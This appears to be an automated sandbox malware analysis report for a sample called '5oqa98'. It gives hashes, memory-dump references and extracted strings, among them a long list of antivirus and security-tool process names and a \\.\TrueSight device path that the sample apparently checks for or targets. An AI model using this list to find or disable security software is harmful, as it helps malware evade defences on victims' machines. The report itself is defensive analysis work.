                                                      • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                      • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                      • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                      • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                      Execution Graph

                                                       Execution Coverage: 6%
                                                       Dynamic/Decrypted Code Coverage: 100%
                                                       Signature Coverage: 4%
                                                       Total number of Nodes: 124
                                                       Total number of Limit Nodes: 2

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2573641714.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                       • Associated: 00000008.00000002.2573620459.00000000028F0000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp
                                                       • Associated: 00000008.00000002.2573691251.0000000002914000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 00000008.00000002.2573709719.0000000002916000.00000002.00001000.00020000.00000000.sdmp
                                                       • Associated: 00000008.00000002.2573726264.0000000002918000.00000020.00001000.00020000.00000000.sdmp
                                                       • Associated: 00000008.00000002.2573753992.000000000294C000.00000004.00001000.00020000.00000000.sdmp
                                                       • Associated: 00000008.00000002.2573778595.0000000002952000.00000020.00001000.00020000.00000000.sdmp
                                                       • Associated: 00000008.00000002.2574011960.0000000002B45000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_28f0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: 360Safe.exe$360sd.exe$360tray.exe$AYAgent.aye$BLuPro.exe$BaiduSd.exe$Bka.exe$BkavService.exe$BkavSystemServer.exe$BkavSystemService.exe$BkavSystemService64.exe$BkavUtil.exe$BluProService.exe$C:\Windows\System32\drivers\189atohci.sys$D"$D"$HipsDaemon.exe$HipsMain.exe$HipsTray.exe$K7TSecurity.exe$KSafeTray.exe$KvMonXP.exe$LAVService.exe$LISFService.exe$LenovoPcManagerService.exe$LenovoTray.exe$LnvSvcFdn.exe$MsMpEng.exe$NisSrv.exe$PSafeSysTray.exe$PopWndLog.exe$PromoUtil.exe$QHActiveDefense.exe$QHSafeMain.exe$QHSafeScanner.exe$QHSafeTray.exe$QHWatchdog.exe$QMDL.exe$QMPersonalCenter.exe$QQPCMgrUpdate.exe$QQPCPatch.exe$QQPCRTP.exe$QQPCRealTimeSpeedup.exe$QQPCTray.exe$QQRepair.exe$QUHLPSVC.EXE$RavMonD.exe$SecurityHealthSystray.exe$TMBMSRV.exe$UnThreat.exe$V3Svc.exe$ZhuDongFangYu.exe$\\.\TrueSight$ad-watch.exe$ashDisp.exe$avcenter.exe$avgwdsvc.exe$avp.exe$avpui.exe$baiduSafeTray.exe$cefutil.exe$knsdtray.exe$kscan.exe$ksetupwiz.exe$kwsprotect64.exe$kxemain.exe$kxescore.exe$kxetray.exe$mpcopyaccelerator.exe$mssecess.exe$remupd.exe$rtvscan.exe$vsserv.exe$wsctrl.exe$wsctrl10.exe$wsctrl11.exe$wsctrlsvc.exe
                                                      • API String ID: 3215553584-2746239348
                                                      • Opcode ID: 04a099e1945153ba78488db7a66343e57d8327102518b5817018baafa47bfd57
                                                      • Instruction ID: aa03e8dd650741aca39f007f45dcb05bb3566ee67abaabaf98eaf234ffcec9af
                                                      • Opcode Fuzzy Hash: 04a099e1945153ba78488db7a66343e57d8327102518b5817018baafa47bfd57
                                                      • Instruction Fuzzy Hash: A802BC36205F81D9EB61DF21E8943DA33A9F748358F500226DE9D57B68EF39C2A9C740

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2573641714.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                      • Associated: 00000008.00000002.2573620459.00000000028F0000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.2573691251.0000000002914000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.2573709719.0000000002916000.00000002.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.2573726264.0000000002918000.00000020.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.2573753992.000000000294C000.00000004.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.2573778595.0000000002952000.00000020.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.2574011960.0000000002B45000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_28f0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TCLService$\\.\pipe\%s$ntsvcs
                                                      • API String ID: 0-2389069860
                                                      • Opcode ID: 2410c69ba36dfc152989daa0538838d8773e1888ba581d26efc123da90528e95
                                                      • Instruction ID: 884ea90c79738166184b2a60f82138b1a0007f3211579366a4dfe2197b0855e2
                                                      • Opcode Fuzzy Hash: 2410c69ba36dfc152989daa0538838d8773e1888ba581d26efc123da90528e95
                                                      • Instruction Fuzzy Hash: F33208BA6092C68EE774CF35C9543EA3762F39434CF54813AC70A9AE4CEBB1D6459B40

                                                      Control-flow Graph

                                                      APIs
                                                      • GetFileAttributesA.KERNEL32 ref: 0062E920
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID: .$2$3$A$A$A$A$F$F$G$S$b$b$d$e$e$e$e$e$e$e$e$i$i$i$i$k$l$l$l$l$l$n$r$r$r$s$s$t$t$t$t$t$t$t$t$u$u
                                                      • API String ID: 3188754299-970789115
                                                      • Opcode ID: 87bb6b810beafd5e56fe44c18cd7a01b0a1985ad6d6227ac30147871eff9ff27
                                                      • Instruction ID: 419c5d6588e5c8604a32263b15a7dce3b28d0ce93ba3af59cc76bde77c928ad4
                                                      • Opcode Fuzzy Hash: 87bb6b810beafd5e56fe44c18cd7a01b0a1985ad6d6227ac30147871eff9ff27
                                                      • Instruction Fuzzy Hash: D151802050C7C0CEE352C628C44875BBFE26BA2748F48499DB1C98A392D7FF9558C767

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: File$CreateWrite
                                                      • String ID: A$C$C$F$F$H$W$a$a$d$e$e$e$e$e$e$e$i$i$i$l$l$l$l$n$o$r$r$s$t$t
                                                      • API String ID: 2263783195-3987612189
                                                      • Opcode ID: 305012309f1f506a9ae185b57c22c1c419adf828ac335499a933d71724a0fa4a
                                                      • Instruction ID: 4433212542230bb6ff2c8d9d205a830695f64a4a8101033250b4a7186f4703a9
                                                      • Opcode Fuzzy Hash: 305012309f1f506a9ae185b57c22c1c419adf828ac335499a933d71724a0fa4a
                                                      • Instruction Fuzzy Hash: 4541D23010CBC4CEE361DB28C44875FFFD1ABA2709F14495D91D9872A2CBBA8558DB67

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: .$2$3$4$6$C$G$S$T$c$d$e$e$e$e$e$i$k$k$l$l$l$l$n$n$o$p$r$t$t$u
                                                      • API String ID: 3472027048-1678096204
                                                      • Opcode ID: f23281ce99727d82e4429899fda81e9298da085c9400dda77c106ed9c0d8467d
                                                      • Instruction ID: 448b5b4bde8bb151a04ded52a7db17555ba2349999b13b08aaa72d99a5994c86
                                                      • Opcode Fuzzy Hash: f23281ce99727d82e4429899fda81e9298da085c9400dda77c106ed9c0d8467d
                                                      • Instruction Fuzzy Hash: 0D419D2050CBC48AE742D768844875FFFD2ABA6748F48099DB0C98A392C6FAC558C767

                                                      Control-flow Graph

                                                      APIs
                                                      • GetFileAttributesA.KERNEL32 ref: 00629277
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID: .$2$3$A$A$F$G$b$d$e$e$e$e$e$i$i$k$l$l$l$l$n$r$r$s$t$t$t$t$u
                                                      • API String ID: 3188754299-2392786682
                                                      • Opcode ID: 04168a18ef9139a812866acbdbe25316e2cb333e53e11c57863f81b89438e9d5
                                                      • Instruction ID: 6ae65ad1b0ebe7193e567afa153492b3169c9d0e03622ec2f751ac9f85b5de5e
                                                      • Opcode Fuzzy Hash: 04168a18ef9139a812866acbdbe25316e2cb333e53e11c57863f81b89438e9d5
                                                      • Instruction Fuzzy Hash: 9C31612041C7C0D9E362D628C48875FBFE26BA3748F88199DB2C44A292D7FF8558C727

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,-00000003,0062DD8F), ref: 0062AFD6
                                                        • Part of subcall function 0062E7E5: GetFileAttributesA.KERNEL32 ref: 0062E920
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFile
                                                      • String ID: A$C$D$a$b.qqqq\:v$c$e$e$e$i$o$peelS$r$r$r$t$t$y
                                                      • API String ID: 3401506121-3195934931
                                                      • Opcode ID: 79a0a39577bae7287bb455bf0b90777d0d2de0e0be1f0a6853e8eddb745c8297
                                                      • Instruction ID: fdcb39354d7cd57bc9a4834de0208e8fd2d42fab7d627e126247eeee8e753a53
                                                      • Opcode Fuzzy Hash: 79a0a39577bae7287bb455bf0b90777d0d2de0e0be1f0a6853e8eddb745c8297
                                                      • Instruction Fuzzy Hash: C4414F3100CB888FD746E718D5446DBBBD2FBA5304F044A6DB0CA87295DEB99648CB9B

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$A$A$A$C$F$F$GAOrI$H$H$H$HpS$I$I$I$I$O$O$R$S$U$a$a$a$a$c$c$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$i$i$i$l$l$l$l$l$l$l$l$l$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$t$t$t$t$t$t$t$t$t$w
                                                      • API String ID: 0-515521434
                                                      • Opcode ID: c976aab0f775c25f95919249f3c08615063415f290fb3655b1620a153c3b787e
                                                      • Instruction ID: 011104e09dfbfd66b730e48d424f9c28ee10c40666fd92e1dac5a7624bfc2dc2
                                                      • Opcode Fuzzy Hash: c976aab0f775c25f95919249f3c08615063415f290fb3655b1620a153c3b787e
                                                      • Instruction Fuzzy Hash: 3502A73010C7C4CEE772DB28C44879FBFD2ABA6709F04495D91CD86292CBBA5558CB67
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb87282369c2248f9bec853ac7d1d5c57026666bbbbcfbeb5fe557e72dfe5db0
                                                      • Instruction ID: b3cfd294af26ae3512fc89e71279f0c51f5d5a0b222a415b97d77da74408e477
                                                      • Opcode Fuzzy Hash: eb87282369c2248f9bec853ac7d1d5c57026666bbbbcfbeb5fe557e72dfe5db0
                                                      • Instruction Fuzzy Hash: 2DD0C714330E380DF76C015C1E6E37471C1E768943FD0427E9406E19D1E846D4C18186

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID: .$.$.$2$2$3$3$:$A$B$C$M$S$T$\$a$a$a$b$b$d$d$d$d$e$e$e$e$e$e$e$e$e$e$g$g$h$k$l$l$l$l$l$l$n$o$p$q$q$q$q$r$r$r$r$s$s$s$t$u$v$x
                                                      • API String ID: 3188754299-41237169
                                                      • Opcode ID: 278bb6a0c95df8cbe6b0dc37eb8a9394ebad8f402e8faf3dab616e8676553c30
                                                      • Instruction ID: 17fba7120d488fd5ac1897f5fa2122fd3e5a91e932faf65278be2fe6bcfc553b
                                                      • Opcode Fuzzy Hash: 278bb6a0c95df8cbe6b0dc37eb8a9394ebad8f402e8faf3dab616e8676553c30
                                                      • Instruction Fuzzy Hash: BBA12B2010DBD0CDE362D738D44879FBFD2ABA2348F54495DA1C987292CFBA8559CB27